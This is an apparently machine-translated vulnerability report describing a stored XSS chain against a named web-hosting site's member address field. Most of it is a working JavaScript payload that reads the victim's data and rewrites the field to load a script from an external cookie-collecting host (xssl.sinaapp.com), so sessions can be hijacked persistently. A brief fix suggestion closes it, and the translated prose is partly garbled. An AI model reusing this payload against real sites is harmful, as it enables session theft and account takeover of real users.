The use of the host House Self-plug-in points can pass through. Host House member center personal information detailed address contact QQ there are stored XSS insert statement "> <input type =: hidden was originally a self-inserted point, and found no excessive modification of Personal Information (@ Xiaochuan. Looking for, found such an address http://www.zhujiwu.com/test/test.asp seems to be checking the white list of places, really do not know what this URL is used. The inserted url parameter is directly brought into the iframe framework. src is a white XSS, so that you can jump from this to the self-inserted position. So we construct javascript
<meta charset="utf8"><script lnaguage="javascript"> function createRequest(){ var xmlHttp=false; if(window.XMLHttpRequest){ xmlHttp = new XMLHttpRequest(); }else if(window.ActiveXObject){ try{ xmlHttp = new ActiveXObject("Msxml2.XMLHTTP"); }catch(error1){ try{ xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); }catch(error2){ xmlHttp = false; } } } return xmlHttp; } var getAddress; if(getAddress=createRequest()){ getAddress.open("GET","/member/account/basic.asp"); getAddress.onreadystatechange=updatePage; getAddress.send(null); } var xml; function updatePage() { if(getAddress.readyState == 4 ) { if(getAddress.status == 200) { var str = getAddress.responseText; rex = /name="Address" value="(.*)" size="38"/; var ttt = rex.exec(str); if(xml=createRequest()){ xml.open("POST","/cmd/member/setBasic.asp?cmd=set"); xml.onreadystatechange = attack; var body = "areaID=0&provinceID=1&cityID=1&Address="+encodeURI(ttt[1])+"%22%3E%3Cscript%20src%3Dhttp%3A%2F%2Fxssl.sinaapp.com%2F0S3c9D%3F1383890465%3E%3C%2Fscript%3E%3Cinput%20type%3D%22hidden&=&LinkMan=asdf&Tel=12345789&QQ=123456789&=%E4%BF%9D%E5%AD%98%E4%BF%AE%E6%94%B9&"; xml.setRequestHeader("Content-type","application/x-www-form-urlencoded"); xml.send(body); } }else if(getAddress.status==404){ alert("404"); }else { alert("status:"+getAddress.statusText); } } } function attack(){ if(xml.readyState == 4 ){ if(xml.status == 200){ } } }</script>
You can get the current detailed address and insert your own code as a disguise. The host house does not have HTTPonly to demonstrate the final process of sending us access address: http://www.zhujiwu.com/test/test.asp? Url = xxxxx.sinaapp.com/xxxx.html cannot expose the sae address, such as this address. Original page: cookie received after url access
There are still a lot of people who can see personal information, such as administrators! In this way, personal users can be hijacked permanently! Above!
Solution:Encode the output to the three locations!